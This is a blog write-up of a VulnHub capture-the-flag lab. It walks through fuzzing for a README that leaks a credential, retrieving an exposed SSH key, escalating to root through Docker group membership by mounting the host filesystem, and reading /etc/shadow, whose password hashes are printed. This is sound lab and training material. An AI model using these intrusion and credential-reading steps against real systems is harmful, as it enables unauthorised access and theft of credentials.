Windy's little blog

https://www.vulnhub.com/entry/xpto-system-1,635/

Scan ports, 80 and 1337(ssh) are open.

Nmap told us there is ".git" folder, then I use GitTools, but get nothing useful.

We continue to scan port 80.

Check source code of login.php, we notice there should be a README file.

We use wfuzz to get the extension of README file.

┌──(kali㉿mykali)-[~/Documents/xptosystem]
└─$ wfuzz -w /usr/share/seclists/Fuzzing/extensions-compressed.fuzz.txt  --hh 276 "http://192.168.33.130/README.FUZZ"                                                                                              
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. 
 Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://192.168.33.130/README.FUZZ
Total requests: 186
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                  
=====================================================================
000000081:   200        23 L     53 W       363 Ch      "md"                                     
Total time: 0
Processed Requests: 186
Filtered Requests: 185
Requests/sec.: 0

Check the content of README.md, find a usrname:password pair, and a folder "/delete-me".

┌──(kali㉿mykali)-[~/Documents/xptosystem]
└─$ curl http://192.168.33.130/README.md
#TODO
- Consertar a pagina de logout
- Criar a pagina de dashboard pos login
#Comandos uteis
##Start container
$ docker run --name webserver -d -p 80:80 -v ~/http:/var/www/html php:apache
##Stop container
$ docker stop webserver
##Start container
$ docker start webserver
##Image list
$ docker images
##Credential
web:pipocadoce
### View Access
/delete-me

  Visit /delete-me, we get a ssh private key.

┌──(kali㉿mykali)-[~/Documents/xptosystem]
└─$ curl http://192.168.33.130/delete-me/
<html>
<head>
  <title>Key for Access</title>
</head>
<body>
<h2>Follow access data for server</h2>
<pre>
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC13HPc3c
tLDiaRrkdVlYzNAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQC7NKnI03+l
...
wI21jo1EbjVLKbJrIQEJFGzmPLBUEspriCY3BTIdXNl1jxgUZ4RRR6hirIjm66DZIfrK/d
yO+JHU72kIccUQTAI3EMmtkxI3b6u+Y1BpKyKKq/BVLlhQnrUpXqPuJCJEz9cqQ8gRNmaa
zq6sb9anB+QPpgBYUdUOVZ9nwzfAw=
</pre>
<h1>Good Luck ;)</h1>
</body>
</html>

Download the ssh key data as file id_rsa, and modify it to the right format (add the BEGIN and END lines). Don't forget to chmod 600.

┌──(kali㉿mykali)-[~/Documents/xptosystem]
└─$ cat id_rsa                              
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC13HPc3c
...
yO+JHU72kIccUQTAI3EMmtkxI3b6u+Y1BpKyKKq/BVLlhQnrUpXqPuJCJEz9cqQ8gRNmaa
zq6sb9anB+QPpgBYUdUOVZ9nwzfAw=
-----END OPENSSH PRIVATE KEY-----

Now we can enter ssh as user "web", with the password of the ssh key.

In home folder, there is remember.txt, we can find the password of another user, which is a rabbit hole.

I enum a lot, but can not get root. Then let's check the author's note on VulnHub.

Our goal is to get a hidden directory, the directory's name is the password of root.

Good thing is, user "web" is in docker group.

There is only one image and one container on the machine, which is the web server.

We can mount the root folder into docker, when we can have root privilege at the same time.

web@xptosystem:~$ docker run -v /:/mnt -i -t php:apache /bin/bash
root@e07d13fc2299:/var/www/html# cd /mnt/root
root@e07d13fc2299:/mnt/root# ls -la
total 24
drwx------  3 root root 4096 Sep  3  2020 .
drwxr-xr-x 18 root root 4096 Mar 16 02:40 ..
-rw-------  1 root root   10 Dec 17 21:18 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Aug 20  2020 .local
-rw-r--r--  1 root root  290 Aug 20  2020 .profile
root@e07d13fc2299:/mnt/root#

Then we can get the root password hash.

root@e07d13fc2299:/mnt/root# cd /mnt/etc
root@e07d13fc2299:/mnt/etc# cat shadow
root:$6$o/k7d563qPPliQWL$cc4vN4uZ6dmh4YoP/pnHdZz3xZExq1N.J83sfWRJy3wdIrXKjTPER3bcQKDaHYBjA/6EsA6c9Zj5zGL3VLEMm1:18508:0:99999:7:::
daemon:*:18494:0:99999:7:::
...
sshd:*:18494:0:99999:7:::
systemd-coredump:!!:18494::::::
web:$6$6caYruQd7gWLfrGs$w.VkTioPN.TvWEZ1lTsj/QSzGoMHxHmTSJUHQrLvQ0k5Dll/A.wDevhJQR2bMIZqgTAJd0dq9K3PLFjhX1Lj7.:18494:0:99999:7:::
sysdev:$6$CMnj1i3VnF0Dev7p$4LssZsU4sW7cRVf7tEcth4vmB8umVzae6FLTrEDQI.SFJFeVme.uTe5Ws8GxpZO5cXRUAD8kcbJYuxIL2AX0e/:18508:0:99999:7:::
root@e07d13fc2299:/mnt/etc#

We can burte force the password hash, but I prefer find other ways.

Let's find a special directory that made less than 4 months. ( Because the author made the machine Dec. 2020)

We need "-not -path" to filter some folders/files we don't need.

Here is my command in docker.

root@e07d13fc2299:/mnt/etc# find /mnt/ -mtime -120 -not -path "/mnt/proc/*" -not -path "/mnt/sys/*" -not -path "/mnt/var/lib/docker/*" -not -path "/mnt/run/*"

Then we get a strange folder.

If we directly visit the folder in VM, we have no access.

In docker, we can read the secret file in this folder. (And this folder's name is really in rockyou.txt, so we can brute force it.)

Check the file type, it's PDF.

We can copy the secret file to /mnt/tmp of docker, which is /tmp folder of the VM.

And chmod 666 so we can read it.

At last, we download the secret file from VM, and open it. Here is the flag.